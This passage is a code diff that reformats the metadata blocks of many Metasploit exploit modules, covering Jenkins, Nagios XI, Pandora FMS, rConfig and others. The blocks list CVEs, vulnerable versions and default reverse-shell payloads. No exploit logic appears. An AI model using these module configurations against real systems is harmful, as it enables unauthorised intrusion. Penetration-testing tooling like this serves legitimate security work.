-            'Grant Willcox' # Module enhancements and documentation fixes.
-          ],
-        'References' =>
-          [
-            [ 'EDB', '49869' ],
-            [ 'CVE', '2021-33393'],
-            [ 'URL', 'https://github.com/MucahitSaratar/ipfire-2-25-auth-rce'],
-            [ 'URL', 'https://www.youtube.com/watch?v=5FUXV7dfNjg'],
-          ],
+        'Author' => [
+          'Mücahit Saratar <trregen222@gmail.com>', # vulnerability research & exploit development
+          'Grant Willcox' # Module enhancements and documentation fixes.
+        ],
+        'References' => [
+          [ 'EDB', '49869' ],
+          [ 'CVE', '2021-33393'],
+          [ 'URL', 'https://github.com/MucahitSaratar/ipfire-2-25-auth-rce'],
+          [ 'URL', 'https://www.youtube.com/watch?v=5FUXV7dfNjg'],
+        ],
         'Platform' => ['python' ],
         'Privileged' => true,
         'Arch' => [ ARCH_PYTHON ],
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'Python Dropper',
-              {
-                'Platform' => 'python',
-                'Arch' => [ ARCH_PYTHON ],
-                'Type' => :unix_memory,
-                'DefaultOptions' => {
-                  'PAYLOAD' => 'python/meterpreter/reverse_tcp'
-                }
+            'Python Dropper',
+            {
+              'Platform' => 'python',
+              'Arch' => [ ARCH_PYTHON ],
+              'Type' => :unix_memory,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'python/meterpreter/reverse_tcp'
               }
-            ]
-          ],
+            }
+          ]
+        ],
         'DisclosureDate' => '2021-05-17',
         'Notes' => {
           'Reliability' => [ REPEATABLE_SESSION ],

--- a/modules/exploits/linux/http/jenkins_cli_deserialization.rb
+++ b/modules/exploits/linux/http/jenkins_cli_deserialization.rb
@@ -26,36 +26,32 @@ class MetasploitModule < Msf::Exploit::Remote
           endpoint to achieve code execution on the target.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-        [
+        'Author' => [
           'SSD', # PoC
           'Unknown', # Vulnerability discovery
           'Shelby Pace' # Metasploit module
         ],
-        'References' =>
-          [
-            [ 'URL', 'https://www.jenkins.io/security/advisory/2017-04-26/'],
-            [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-cloudbees-jenkins-unauthenticated-code-execution/'],
-            [ 'CVE', '2017-1000353']
-          ],
+        'References' => [
+          [ 'URL', 'https://www.jenkins.io/security/advisory/2017-04-26/'],
+          [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-cloudbees-jenkins-unauthenticated-code-execution/'],
+          [ 'CVE', '2017-1000353']
+        ],
         'Privileged' => false,
         'Platform' => 'linux',
         'Arch' => [ ARCH_X86, ARCH_X64 ],
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'Linux',
-              {
-                'Platform' => 'linux',
-                'CmdStagerFlavor' => [ 'wget', 'curl' ],
-                'Arch' => [ ARCH_X86, ARCH_X64 ],
-                'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }
-              }
-            ]
-          ],
+            'Linux',
+            {
+              'Platform' => 'linux',
+              'CmdStagerFlavor' => [ 'wget', 'curl' ],
+              'Arch' => [ ARCH_X86, ARCH_X64 ],
+              'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }
+            }
+          ]
+        ],
         'DisclosureDate' => '2017-04-26',
-        'Notes' =>
-        {
+        'Notes' => {
           'Stability' => [ CRASH_SAFE ],
           'Reliability' => [ UNRELIABLE_SESSION ],
           'SideEffects' => [ IOC_IN_LOGS ]

--- a/modules/exploits/linux/http/klog_server_authenticate_user_unauth_command_injection.rb
+++ b/modules/exploits/linux/http/klog_server_authenticate_user_unauth_command_injection.rb
@@ -31,14 +31,12 @@ class MetasploitModule < Msf::Exploit::Remote
           virtual appliance.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-        [
+        'Author' => [
           'b3kc4t', # Vulnerability discovery and exploit
           'Metin Yunus Kandemir', # Metasploit module
           'bcoles', # Metasploit module
         ],
-        'References' =>
-        [
+        'References' => [
           ['CVE', '2020-35729'],
           ['CWE', '78'],
           ['EDB', '49366'],
@@ -48,11 +46,10 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://github.com/mustgundogdu/Research/tree/main/KLOG_SERVER'],
           ['URL', 'https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection']
         ],
-        'DefaultOptions' =>
-          {
-            'SSL' => true,
-            'RPORT' => 443
-          },
+        'DefaultOptions' => {
+          'SSL' => true,
+          'RPORT' => 443
+        },
         'Platform' => %w[unix linux],
         'Targets' => [
           [
@@ -86,12 +83,11 @@ class MetasploitModule < Msf::Exploit::Remote
         'Privileged' => true,
         'DisclosureDate' => '2020-12-27',
         'DefaultTarget' => 0,
-        'Notes' =>
-          {
-            'Stability' => [ CRASH_SAFE ],
-            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
-            'Reliability' => [ REPEATABLE_SESSION ]
-          }
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
       )
     )
     register_options(

--- a/modules/exploits/linux/http/linuxki_rce.rb
+++ b/modules/exploits/linux/http/linuxki_rce.rb
@@ -22,61 +22,58 @@ class MetasploitModule < Msf::Exploit::Remote
             The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
           },
           'License' => MSF_LICENSE,
-          'Author' =>
-              [
-                'Cody Winkler', # discovery and poc
-                'numan türle' # msf exploit
-              ],
-          'References' =>
-              [
-                ['EDB', '48483'],
-                ['CVE', '2020-7209'],
-                ['PACKETSTORM', '157739'],
-                ['URL', 'https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78']
-              ],
+          'Author' => [
+            'Cody Winkler', # discovery and poc
+            'numan türle' # msf exploit
+          ],
+          'References' => [
+            ['EDB', '48483'],
+            ['CVE', '2020-7209'],
+            ['PACKETSTORM', '157739'],
+            ['URL', 'https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78']
+          ],
           'Privileged' => false,
           'Platform' => ['php', 'unix', 'linux'],
           'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],
-          'Targets' =>
-              [
-                [
-                  'Automatic (PHP In-Memory)',
-                  {
-                    'Platform' => 'php',
-                    'Arch' => ARCH_PHP,
-                    'Type' => :php_memory,
-                    'Payload' => { 'BadChars' => "'" },
-                    'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
-                  }
-                ],
-                [
-                  'Automatic (PHP Dropper)',
-                  {
-                    'Platform' => 'php',
-                    'Arch' => ARCH_PHP,
-                    'Type' => :php_dropper,
-                    'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
-                  }
-                ],
-                [
-                  'Automatic (Unix In-Memory)',
-                  {
-                    'Platform' => 'unix',
-                    'Arch' => ARCH_CMD,
-                    'Type' => :unix_memory,
-                    'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
-                  }
-                ],
-                [
-                  'Automatic (Linux Dropper)',
-                  {
-                    'Platform' => 'linux',
-                    'Arch' => [ARCH_X86, ARCH_X64],
-                    'Type' => :linux_dropper,
-                    'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
-                  }
-                ]
-              ],
+          'Targets' => [
+            [
+              'Automatic (PHP In-Memory)',
+              {
+                'Platform' => 'php',
+                'Arch' => ARCH_PHP,
+                'Type' => :php_memory,
+                'Payload' => { 'BadChars' => "'" },
+                'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
+              }
+            ],
+            [
+              'Automatic (PHP Dropper)',
+              {
+                'Platform' => 'php',
+                'Arch' => ARCH_PHP,
+                'Type' => :php_dropper,
+                'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
+              }
+            ],
+            [
+              'Automatic (Unix In-Memory)',
+              {
+                'Platform' => 'unix',
+                'Arch' => ARCH_CMD,
+                'Type' => :unix_memory,
+                'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+              }
+            ],
+            [
+              'Automatic (Linux Dropper)',
+              {
+                'Platform' => 'linux',
+                'Arch' => [ARCH_X86, ARCH_X64],
+                'Type' => :linux_dropper,
+                'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
+              }
+            ]
+          ],
           'DisclosureDate' => '2020-05-17',
           'DefaultTarget' => 0
         )

--- a/modules/exploits/linux/http/microfocus_obr_cmd_injection.rb
+++ b/modules/exploits/linux/http/microfocus_obr_cmd_injection.rb
@@ -21,28 +21,25 @@ class MetasploitModule < Msf::Exploit::Remote
           This module has been tested on the Linux 10.40 version. Older versions might be affected,
           check the advisory for details.
         },
-        'Author' =>
-          [
-            'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
-          ],
+        'Author' => [
+          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
+        ],
         'License' => MSF_LICENSE,
-        'References' =>
-          [
-            ['CVE', '2021-22502'],
-            ['ZDI', '21-153'],
-            ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md'],
-            ['URL', 'https://softwaresupport.softwaregrp.com/doc/KM03775947']
-          ],
+        'References' => [
+          ['CVE', '2021-22502'],
+          ['ZDI', '21-153'],
+          ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md'],
+          ['URL', 'https://softwaresupport.softwaregrp.com/doc/KM03775947']
+        ],
         'Platform' => 'unix',
         'Arch' => ARCH_CMD,
         'Privileged' => true,
-        'Payload' =>
-          {
-            'Space' => 1024, # This should be a safe value, it might take much more
-            'DisableNops' => true,
-            # avoid null char and the injection char (`)
-            'BadChars' => "\x00\x60",
-            'Compat' =>
+        'Payload' => {
+          'Space' => 1024, # This should be a safe value, it might take much more
+          'DisableNops' => true,
+          # avoid null char and the injection char (`)
+          'BadChars' => "\x00\x60",
+          'Compat' =>
               {
                 'PayloadType' => 'cmd',
                 # all of these (and more) should exist in a standard RHEL / SuSE
@@ -52,11 +49,10 @@ class MetasploitModule < Msf::Exploit::Remote
                 # all reverse shells were tested and work flawlessly
                 'RequiredCmd' => 'netcat openssl generic python'
               }
-          },
-        'Targets' =>
-          [
-            [ 'Micro Focus Operations Bridge Reporter (Linux) versions <= 10.40', {} ],
-          ],
+        },
+        'Targets' => [
+          [ 'Micro Focus Operations Bridge Reporter (Linux) versions <= 10.40', {} ],
+        ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2021-02-09'
       )

--- a/modules/exploits/linux/http/mida_solutions_eframework_ajaxreq_rce.rb
+++ b/modules/exploits/linux/http/mida_solutions_eframework_ajaxreq_rce.rb
@@ -29,48 +29,45 @@ class MetasploitModule < Msf::Exploit::Remote
           eFramework-C7-2.9.0 virtual appliance.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'elbae', # discovery and exploit
-            'bcoles', # Metasploit
-          ],
-        'References' =>
-          [
-            ['CVE', '2020-15920'],
-            ['EDB', '48768'],
-            ['URL', 'https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html'],
-          ],
+        'Author' => [
+          'elbae', # discovery and exploit
+          'bcoles', # Metasploit
+        ],
+        'References' => [
+          ['CVE', '2020-15920'],
+          ['EDB', '48768'],
+          ['URL', 'https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html'],
+        ],
         'Payload' => { 'BadChars' => "\x00" },
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'Linux (x86)', {
-                'Arch' => ARCH_X86,
-                'Platform' => 'linux',
-                'DefaultOptions' => {
-                  'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'
-                }
+            'Linux (x86)', {
+              'Arch' => ARCH_X86,
+              'Platform' => 'linux',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'
               }
-            ],
-            [
-              'Linux (x64)', {
-                'Arch' => ARCH_X64,
-                'Platform' => 'linux',
-                'DefaultOptions' => {
-                  'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
-                }
-              }
-            ],
-            [
-              'UNIX (cmd)', {
-                'Arch' => ARCH_CMD,
-                'Platform' => 'unix',
-                'DefaultOptions' => {
-                  'PAYLOAD' => 'cmd/unix/reverse_bash'
-                }
-              }
-            ]
+            }
           ],
+          [
+            'Linux (x64)', {
+              'Arch' => ARCH_X64,
+              'Platform' => 'linux',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'UNIX (cmd)', {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'unix',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ]
+        ],
         'Privileged' => true,
         'DisclosureDate' => '2020-07-24',
         'DefaultOptions' => {
@@ -78,12 +75,11 @@ class MetasploitModule < Msf::Exploit::Remote
           'SSL' => true
         },
         'DefaultTarget' => 1,
-        'Notes' =>
-          {
-            'Stability' => [ CRASH_SAFE ],
-            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
-            'Reliability' => [ REPEATABLE_SESSION ]
-          }
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
       )
     )
     register_options([

--- a/modules/exploits/linux/http/nagios_xi_mibs_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_mibs_authenticated_rce.rb
@@ -27,46 +27,42 @@ class MetasploitModule < Msf::Exploit::Remote
           been successfully tested against Nagios XI 5.7.3 running on CentOS 7.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Chris Lyne', # discovery
-            'Matthew Aberegg', # PoC
-            'Erik Wynter' # @wyntererik - Metasploit
-          ],
-        'References' =>
-          [
-            ['CVE', '2020-5791'],
-            ['EDB', '48959']
-          ],
+        'Author' => [
+          'Chris Lyne', # discovery
+          'Matthew Aberegg', # PoC
+          'Erik Wynter' # @wyntererik - Metasploit
+        ],
+        'References' => [
+          ['CVE', '2020-5791'],
+          ['EDB', '48959']
+        ],
         'Platform' => %w[linux unix],
         'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'Linux (x86/x64)', {
-                'Arch' => [ ARCH_X86, ARCH_X64 ],
-                'Platform' => 'linux',
-                'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
-              }
-            ],
-            [
-              'CMD', {
-                'Arch' => [ ARCH_CMD ],
-                'Platform' => 'unix',
-                # the only reliable payloads against a typical Nagios XI host (CentOS 7 minimal) seem to be cmd/unix/reverse_perl_ssl and cmd/unix/reverse_openssl
-                'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' }
-              }
-            ]
+            'Linux (x86/x64)', {
+              'Arch' => [ ARCH_X86, ARCH_X64 ],
+              'Platform' => 'linux',
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
+            }
           ],
+          [
+            'CMD', {
+              'Arch' => [ ARCH_CMD ],
+              'Platform' => 'unix',
+              # the only reliable payloads against a typical Nagios XI host (CentOS 7 minimal) seem to be cmd/unix/reverse_perl_ssl and cmd/unix/reverse_openssl
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' }
+            }
+          ]
+        ],
         'Privileged' => false,
         'DisclosureDate' => '2020-10-20',
         'DefaultTarget' => 0,
-        'Notes' =>
-          {
-            'Stability' => [ CRASH_SAFE ],
-            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
-            'Reliability' => [ REPEATABLE_SESSION ]
-          }
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
       )
     )
 

--- a/modules/exploits/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.rb
@@ -47,54 +47,50 @@ class MetasploitModule < Msf::Exploit::Remote
           seconds). See the documentation for more information.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Jak Gibb',       # https://github.com/jakgibb/ - Discovery and exploit
-            'Erik Wynter'     # @wyntererik - Metasploit
-          ],
-        'References' =>
-          [
-            ['CVE', '2019-15949'],
-            ['URL', 'https://github.com/jakgibb/nagiosxi-root-rce-exploit'] # original PHP exploit
-          ],
+        'Author' => [
+          'Jak Gibb', # https://github.com/jakgibb/ - Discovery and exploit
+          'Erik Wynter' # @wyntererik - Metasploit
+        ],
+        'References' => [
+          ['CVE', '2019-15949'],
+          ['URL', 'https://github.com/jakgibb/nagiosxi-root-rce-exploit'] # original PHP exploit
+        ],
         'Payload' => { 'BadChars' => "\x00" },
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'Linux (x86)', {
-                'Arch' => ARCH_X86,
-                'Platform' => 'linux',
-                'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
-              }
-            ],
-            [
-              'Linux (x64)', {
-                'Arch' => ARCH_X64,
-                'Platform' => 'linux',
-                'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
-              }
-            ],
-            [
-              'Linux (cmd)', {
-                'Arch' => ARCH_CMD,
-                'Platform' => 'unix',
-                'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },
-                'Payload' => {
-                  'Append' => ' & disown', # the payload must be disowned after execution, otherwise cleanup fails
-                  'BadChars' => '"'
-                }
-              }
-            ]
+            'Linux (x86)', {
+              'Arch' => ARCH_X86,
+              'Platform' => 'linux',
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
+            }
           ],
+          [
+            'Linux (x64)', {
+              'Arch' => ARCH_X64,
+              'Platform' => 'linux',
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'Linux (cmd)', {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'unix',
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },
+              'Payload' => {
+                'Append' => ' & disown', # the payload must be disowned after execution, otherwise cleanup fails
+                'BadChars' => '"'
+              }
+            }
+          ]
+        ],
         'Privileged' => true,
         'DisclosureDate' => '2019-07-29',
         'DefaultOptions' => { 'WfsDelay' => 300 }, # Necessary because the payload connects back with a significant delay. On versions older than 5.5.0 it takes especially long.
         'DefaultTarget' => 1,
-        'Notes' =>
-          {
-            'Stability' => [ CRASH_SAFE, ],
-            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ]
-          }
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ]
+        }
       )
     )
     register_options [

--- a/modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
@@ -28,46 +28,42 @@ class MetasploitModule < Msf::Exploit::Remote
           running on CentOS 7.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Haboob Team', # https://haboob.sa - PoC
-            'Erik Wynter' # @wyntererik - Metasploit'
-          ],
-        'References' =>
-          [
-            ['CVE', '2020-35578'],
-            ['EDB', '49422']
-          ],
+        'Author' => [
+          'Haboob Team', # https://haboob.sa - PoC
+          'Erik Wynter' # @wyntererik - Metasploit'
+        ],
+        'References' => [
+          ['CVE', '2020-35578'],
+          ['EDB', '49422']
+        ],
         'Platform' => %w[linux unix],
         'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD],
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'Linux (x86/x64)', {
-                'Arch' => [ARCH_X86, ARCH_X64],
-                'Platform' => 'linux',
-                # only the wget and perhaps the curl CmdStagers work against a typical Nagios XI host (CentOS 7 minimal) if Nagios XI was installed according to the documentation
-                'CmdStagerFlavor' => :wget,
-                'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
-              }
-            ],
-            [
-              'CMD', {
-                'Arch' => [ARCH_CMD],
-                'Platform' => 'unix',
-                'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
-              }
-            ]
+            'Linux (x86/x64)', {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Platform' => 'linux',
+              # only the wget and perhaps the curl CmdStagers work against a typical Nagios XI host (CentOS 7 minimal) if Nagios XI was installed according to the documentation
+              'CmdStagerFlavor' => :wget,
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
+            }
           ],
+          [
+            'CMD', {
+              'Arch' => [ARCH_CMD],
+              'Platform' => 'unix',
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+            }
+          ]
+        ],
         'Privileged' => false,
         'DisclosureDate' => '2020-12-19',
         'DefaultTarget' => 0,
-        'Notes' =>
-          {
-            'Stability' => [ CRASH_SAFE ],
-            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ],
-            'Reliability' => [FIRST_ATTEMPT_FAIL] # payload may not connect back the first time
-          }
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ],
+          'Reliability' => [FIRST_ATTEMPT_FAIL] # payload may not connect back the first time
+        }
       )
     )
 

--- a/modules/exploits/linux/http/nagios_xi_snmptrap_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_snmptrap_authenticated_rce.rb
@@ -30,45 +30,41 @@ class MetasploitModule < Msf::Exploit::Remote
           been successfully tested against Nagios XI 5.7.3 running on CentOS 7.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Chris Lyne', # discovery
-            'Erik Wynter' # @wyntererik - Metasploit'
-          ],
-        'References' =>
-          [
-            ['CVE', '2020-5792']
-          ],
+        'Author' => [
+          'Chris Lyne', # discovery
+          'Erik Wynter' # @wyntererik - Metasploit'
+        ],
+        'References' => [
+          ['CVE', '2020-5792']
+        ],
         'Platform' => %w[linux unix],
         'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'Linux (x86/x64)', {
-                'Arch' => [ARCH_X86, ARCH_X64],
-                'Platform' => 'linux',
-                'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
-              }
-            ],
-            [
-              'CMD', {
-                'Arch' => [ARCH_CMD],
-                'Platform' => 'unix',
-                # cmd/unix/reverse_awk is one of the few reliable CMD payloads for a typical NagiosXI install (CentOS 7 minimal).
-                # other options are cmd/unix/reverse_perl_ssl and cmd/unix/reverse_openssl
-                'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_awk' }
-              }
-            ],
+            'Linux (x86/x64)', {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Platform' => 'linux',
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
+            }
           ],
+          [
+            'CMD', {
+              'Arch' => [ARCH_CMD],
+              'Platform' => 'unix',
+              # cmd/unix/reverse_awk is one of the few reliable CMD payloads for a typical NagiosXI install (CentOS 7 minimal).
+              # other options are cmd/unix/reverse_perl_ssl and cmd/unix/reverse_openssl
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_awk' }
+            }
+          ],
+        ],
         'Privileged' => false,
         'DisclosureDate' => '2020-10-20',
         'DefaultTarget' => 0,
-        'Notes' =>
-          {
-            'Stability' => [ CRASH_SAFE ],
-            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
-            'Reliability' => [ REPEATABLE_SESSION ]
-          }
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
       )
     )
 

--- a/modules/exploits/linux/http/pandora_fms_events_exec.rb
+++ b/modules/exploits/linux/http/pandora_fms_events_exec.rb
@@ -35,49 +35,46 @@ class MetasploitModule < Msf::Exploit::Remote
           on CentOS 7 (the official virtual appliance ISO for this version).
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Fernando Catoira', # Discovery
-            'Julio Sanchez', # Discovery
-            'Erik Wynter' # @wyntererik - Metasploit
-          ],
-        'References' =>
-          [
-            ['CVE', '2020-13851'], # RCE via the `events` feature
-            ['URL', 'https://www.coresecurity.com/core-labs/advisories/pandora-fms-community-multiple-vulnerabilities']
-          ],
+        'Author' => [
+          'Fernando Catoira', # Discovery
+          'Julio Sanchez', # Discovery
+          'Erik Wynter' # @wyntererik - Metasploit
+        ],
+        'References' => [
+          ['CVE', '2020-13851'], # RCE via the `events` feature
+          ['URL', 'https://www.coresecurity.com/core-labs/advisories/pandora-fms-community-multiple-vulnerabilities']
+        ],
         'Platform' => ['linux', 'unix'],
         'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'Linux (x86)', {
-                'Arch' => ARCH_X86,
-                'Platform' => 'linux',
-                'DefaultOptions' => {
-                  'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'
-                }
+            'Linux (x86)', {
+              'Arch' => ARCH_X86,
+              'Platform' => 'linux',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'
               }
-            ],
-            [
-              'Linux (x64)', {
-                'Arch' => ARCH_X64,
-                'Platform' => 'linux',
-                'DefaultOptions' => {
-                  'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
-                }
-              }
-            ],
-            [
-              'Linux (cmd)', {
-                'Arch' => ARCH_CMD,
-                'Platform' => 'unix',
-                'DefaultOptions' => {
-                  'PAYLOAD' => 'cmd/unix/reverse_bash'
-                }
-              }
-            ]
+            }
           ],
+          [
+            'Linux (x64)', {
+              'Arch' => ARCH_X64,
+              'Platform' => 'linux',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Linux (cmd)', {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'unix',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ]
+        ],
         'Privileged' => false,
         'DisclosureDate' => '2020-06-04',
         'DefaultTarget' => 1

--- a/modules/exploits/linux/http/pandora_ping_cmd_exec.rb
+++ b/modules/exploits/linux/http/pandora_ping_cmd_exec.rb
@@ -17,23 +17,20 @@ class MetasploitModule < Msf::Exploit::Remote
           This module exploits a vulnerability found in Pandora FMS 7.0NG and lower.
           net_tools.php in Pandora FMS 7.0NG allows remote attackers to execute arbitrary OS commands.
         },
-        'Author' =>
-          [
-            'Onur ER <onur@onurer.net>' # Vulnerability discovery and Metasploit module
-          ],
+        'Author' => [
+          'Onur ER <onur@onurer.net>' # Vulnerability discovery and Metasploit module
+        ],
         'DisclosureDate' => '2020-03-09',
         'License' => MSF_LICENSE,
         'Platform' => 'linux',
         'Arch' => [ARCH_X86, ARCH_X64],
         'Privileged' => false,
-        'Targets' =>
-          [
-            ['Automatic Target', {}]
-          ],
-        'DefaultOptions' =>
-          {
-            'Payload' => 'linux/x86/meterpreter/reverse_tcp'
-          },
+        'Targets' => [
+          ['Automatic Target', {}]
+        ],
+        'DefaultOptions' => {
+          'Payload' => 'linux/x86/meterpreter/reverse_tcp'
+        },
         'DefaultTarget' => 0
       )
     )

--- a/modules/exploits/linux/http/rconfig_vendors_auth_file_upload_rce.rb
+++ b/modules/exploits/linux/http/rconfig_vendors_auth_file_upload_rce.rb
@@ -22,31 +22,27 @@ class MetasploitModule < Msf::Exploit::Remote
           Then, the uploaded payload can be triggered by a call to `images/vendor/<payload_file>.php`
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'MURAT ŞEKER', # Exploit-db
-            'VISHWARAJ BHATTRAI', # Exploit-db
-            'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
-          ],
-        'References' =>
-          [
-            ['EDB', '49665'],
-            ['EDB', '49783']
-          ],
+        'Author' => [
+          'MURAT ŞEKER', # Exploit-db
+          'VISHWARAJ BHATTRAI', # Exploit-db
+          'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
+        ],
+        'References' => [
+          ['EDB', '49665'],
+          ['EDB', '49783']
+        ],
         'Platform' => [ 'php' ],
         'Arch' => ARCH_PHP,
         'Privileged' => false,
         'DisclosureDate' => '2021-03-17',
-        'Targets' =>
-        [
+        'Targets' => [
           [ 'rConfig <= 3.9.6', {}]
         ],
-        'Notes' =>
-          {
-            'Stability' => [ CRASH_SAFE ],
-            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
-            'Reliability' => [ REPEATABLE_SESSION ]
-          },
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
